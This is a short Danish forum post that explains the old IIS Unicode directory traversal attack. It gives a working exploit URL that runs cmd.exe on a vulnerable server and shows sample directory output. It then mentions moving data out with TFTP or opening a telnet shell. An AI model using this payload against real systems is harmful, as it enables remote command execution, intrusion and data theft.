Hesten er på det computer der laver forbindelsen... Du kunne i princippet lave det samme i en browser, bare skrive
http://victem/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dirDet ville give noget i stil med det her i browseren hvis victem er et sårbart system:
Enheden i drev D har ikke noget navn
Enhedens serienummer er 1708-195E
Indhold af D:\Desktop
. <DIR> 03-11-01 16.53 .
.. <DIR> 03-11-01 16.53 ..
TRILLIAN LNK 424 16-09-02 0.17 Trillian.lnk
BILLEDER <DIR> 01-05-02 0.07 Billeder
NIKKI <DIR> 17-03-02 2.13 Nikki
DIV <DIR> 05-02-02 15.38 div
DATABA~1 <DIR> 06-04-02 15.08 Database Backups
HLSW LNK 373 02-09-02 22.47 HLSW.lnk
WEBSHO~1 LNK 363 17-09-02 19.36 Webshots Desktop!.lnk
SNAGIT~2 LNK 434 01-07-02 17.37 SnagIt Studio 6.lnk
NETMAN <DIR> 18-05-02 15.58 netman
OUTLOO~1 LNK 430 30-10-02 8.54 Outlook Express with OE-QuoteFix.lnk
COUNTE~1 LNK 412 24-07-02 18.59 Counter Strike.lnk
LYD <DIR> 17-02-02 20.23 lyd
STREAM~1 LNK 395 22-09-02 13.58 Streamload Uploader.lnk
SKINNER LNK 373 30-05-02 15.36 Skinner.lnk
27 fil(er) 400.652.938 byte
19 mappe(r) 1.156,84 MB ledig
Altså output fra dir kommandoen. Her skrivebordet fra min egen windows ME computer i en noget forkortet udgave ;)
Data kan på NT/XP/2K overføres med TFTP uden det store besvær, eller man kunne måske endda lave en shell man kunne forbinde til via telnet.. Det er kun op til angriberens fantasi hvad der er muligt hvis man har fuld adgang til systemet.